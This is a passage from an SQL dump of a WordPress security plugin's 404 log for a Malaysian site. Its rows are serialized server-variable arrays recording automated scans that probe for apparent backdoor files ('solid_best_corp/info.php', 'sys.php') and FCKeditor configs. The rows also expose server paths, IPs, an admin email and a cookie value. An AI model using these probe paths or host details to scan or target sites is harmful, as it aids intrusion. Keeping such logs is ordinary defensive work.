18:10:17',35285736,37086344,'https://bintara.com.my/store/wp-content/plugins/solid_best_corp/sys.php',1,0,'45.55.152.56'),(28156,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:50:\"/store/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/store/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:50:\"/store/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaddI6ZT-TCAziXz9cl0SQAAApU\";s:19:\"REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/store/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:50:\"/store/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaddI6ZT-TCAziXz9cl0SQAAApU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"45.55.152.56\";s:11:\"REMOTE_PORT\";s:5:\"42199\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:72:\"https://bintara.com.my/store/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:50:\"/store/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaddI6ZT-TCAziXz9cl0SQAAApU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571249444.0149\";s:12:\"REQUEST_TIME\";s:10:\"1571249444\";}}','notice','2019-10-16 18:10:46','2019-10-16 18:10:44',35449728,37244976,'https://bintara.com.my/store/wp-content/plugins/solid_best_corp/info.php',1,0,'45.55.152.56'),(28157,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XadkvxdcJkhmy@yeiY5U6gAAAIg\";s:19:\"REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XadkvxdcJkhmy@yeiY5U6gAAAIg\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"45.55.152.56\";s:11:\"REMOTE_PORT\";s:5:\"38839\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:44:\"/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XadkvxdcJkhmy@yeiY5U6gAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571251391.9846\";s:12:\"REQUEST_TIME\";s:10:\"1571251391\";}}','notice','2019-10-16 18:43:13','2019-10-16 18:43:12',35054000,36862672,'https://bintara.com.my/wp-content/plugins/solid_best_corp/info.php',1,0,'45.55.152.56'),(28158,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:43:\"/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:65:\"https://bintara.com.my/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:43:\"/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XadlFqZT-TCAziXz9cl4zgAAAoI\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"https://bintara.com.my/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:43:\"/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XadlFqZT-TCAziXz9cl4zgAAAoI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"45.55.152.56\";s:11:\"REMOTE_PORT\";s:5:\"50351\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"https://bintara.com.my/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:43:\"/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XadlFqZT-TCAziXz9cl4zgAAAoI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571251478.1718\";s:12:\"REQUEST_TIME\";s:10:\"1571251478\";}}','notice','2019-10-16 18:44:39','2019-10-16 18:44:38',35053928,36855432,'https://bintara.com.my/wp-content/plugins/solid_best_corp/sys.php',1,0,'45.55.152.56'),(28159,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/FCKeditor/fckconfig.js\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:44:\"http://bintara.com.my/FCKeditor/fckconfig.js\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/FCKeditor/fckconfig.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xad7M7lwIHsXUl8AjRExjAAAAMc\";s:12:\"REDIRECT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"106.36.160.91\";s:11:\"REMOTE_PORT\";s:5:\"64504\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/FCKeditor/fckconfig.js\";s:10:\"SCRIPT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xad7M7lwIHsXUl8AjRExjAAAAMc\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571257140.145\";s:12:\"REQUEST_TIME\";s:10:\"1571257140\";}}','notice','2019-10-16 20:19:05','2019-10-16 20:19:00',35484664,37290280,'https://bintara.com.my/FCKeditor/fckconfig.js',1,0,'106.36.160.91'),(28160,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:49:\"/2018/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/2018/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:49:\"/2018/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xad9Fz8gURoA5E5i2SFfdQAAAFc\";s:19:\"REDIRECT_SCRIPT_URI\";s:71:\"https://bintara.com.my/2018/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:49:\"/2018/wp-content/plugins/solid_best_corp/info.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xad9Fz8gURoA5E5i2SFfdQAAAFc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.74.5\";s:11:\"REMOTE_PORT\";s:5:\"33250\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:71:\"https://bintara.com.my/2018/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:49:\"/2018/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xad9Fz8gURoA5E5i2SFfdQAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571257623.9425\";s:12:\"REQUEST_TIME\";s:10:\"1571257623\";}}','notice','2019-10-16 20:27:06','2019-10-16 20:27:04',35677400,37473928,'https://bintara.com.my/2018/wp-content/plugins/solid_best_corp/info.php',1,0,'5.196.74.5'),(28161,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/2018/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/2018/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/2018/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xad9T2pOBSDa4Cdq@AxjOwAAAkc\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/2018/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/2018/wp-content/plugins/solid_best_corp/sys.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xad9T2pOBSDa4Cdq@AxjOwAAAkc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.74.5\";s:11:\"REMOTE_PORT\";s:5:\"37738\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/2018/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:48:\"/2018/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xad9T2pOBSDa4Cdq@AxjOwAAAkc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571257679.357\";s:12:\"REQUEST_TIME\";s:10:\"1571257679\";}}','notice','2019-10-16 20:28:02','2019-10-16 20:27:59',35447656,37250272,'https://bintara.com.my/2018/wp-content/plugins/solid_best_corp/sys.php',1,0,'5.196.74.5'),(28162,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.255.152.117\";s:11:\"REMOTE_PORT\";s:5:\"52172\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeBbblwIHsXUl8AjRE59AAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571258733.6252\";s:12:\"REQUEST_TIME\";s:10:\"1571258733\";}}','notice','2019-10-16 20:45:38','2019-10-16 20:45:34',35427984,37230984,'https://bintara.com.my/?page_id=18',1,0,'178.255.152.117'),(28163,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/FCKeditor/fckconfig.js\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=75a476cf31e8c7a1c0dc5c2b74b36f62\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:45:\"http://bintara.com.my//FCKeditor/fckconfig.js\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/FCKeditor/fckconfig.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeFa22CjfSaL8DJw2BQGwAAAEg\";s:12:\"REDIRECT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"106.36.160.91\";s:11:\"REMOTE_PORT\";s:5:\"59189\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/FCKeditor/fckconfig.js\";s:10:\"SCRIPT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeFa22CjfSaL8DJw2BQGwAAAEg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571259755.8368\";s:12:\"REQUEST_TIME\";s:10:\"1571259755\";}}','notice','2019-10-16 21:02:37','2019-10-16 